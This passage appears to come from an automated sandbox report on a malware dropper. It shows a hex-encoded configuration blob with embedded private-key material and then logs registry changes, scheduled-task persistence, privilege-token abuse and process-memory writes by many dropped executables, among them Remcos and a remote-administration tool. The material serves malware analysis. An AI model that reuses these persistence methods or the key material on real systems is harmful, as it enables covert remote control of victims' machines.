306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014207490496" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters C:\Windows\SysWOW64\regedit.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1652 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 1652 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 1652 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 1652 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 1652 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 4408 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 4408 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2184 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2184 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2184 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1652 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 1652 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 2184 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2184 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2184 wrote to memory of 3000 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 2184 wrote to memory of 3000 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 3000 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 3000 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 3000 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 3000 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 3000 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3000 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 376 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe
PID 376 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe
PID 4436 wrote to memory of 5036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4436 wrote to memory of 5036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 1652 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 1652 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 1652 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 1652 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 1652 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 1652 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 1652 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 1652 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3908 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3908 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 1652 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 1652 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 1652 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 1652 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 1652 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 1652 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 1652 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 1652 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 1652 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 1652 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
PID 1652 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

